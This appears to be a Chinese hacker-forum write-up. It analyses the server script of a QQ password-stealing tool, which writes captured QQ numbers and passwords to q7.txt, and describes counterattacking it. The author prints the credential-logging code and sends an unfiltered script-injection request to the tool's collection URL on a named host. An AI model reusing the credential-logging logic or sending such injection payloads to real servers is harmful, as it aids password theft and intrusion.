QQ盗号软件后门分析与反击

看到这..想必大家也和我一样非常气愤..难道我们就任由作者下去吗.当然不..现在我们就开始反击.

我们来看看qq.asp的代码
首先来看

strLogFile="Q7.txt"

这个是QQ接受文件..默认的是q7.txt

继续看代码

QQNumber=request("QQNumber")

QQPassWord=request("QQPassWord")

QQclub=request("QQclub")

QQip=request("QQip")

是没经过任何过滤的..这些参数的数据我们完全可以自定义

在往下看

if QQNumber="" or QQPassWord="" then

response.write "pzQQ"

response.end

假如QQNumber和QQPassWord的值为空就返回pzQQ .然后程序结束工作.. 只要这两个值不为空就继续执行下面的代码

StrLogText =StrLogText&QQNumber&"----"&QQPassWord&"----会员:"& QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")

StrLogText=StrLogText&")"

写入q7.txt文件

格式为 QQ号码----QQ密码----会员:----IP:

继续看下面的代码

set f=Server.CreateObject("scripting.filesystemobject") (没有q7.txt这个文件就自动新建)

set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)

ff.writeline(StrLogText) (打开q7.txt并写入数据)

最后response.write "发送成功!" 满足条件提示成功.

所有的代码也就是这些..程序并未做任何过滤..和处理..也就是说..只要满足qq.asp?QQNumber=123&QQPassWord=123 就回返回 "发送成功!"的提示.

http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=123

图11


这就证明了QQNumber=123&QQPassWord=123这两个我们是可以自己定义的..如果我们写入的不是数字..而且一段脚本代码呢?会不会执行呢..让我们来试下
http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=< ... quot;fhod")</script>

图12


插入代码成功...我们来看下

http://www.ciker.org/soft/q7.txt的源文件又是什么样的..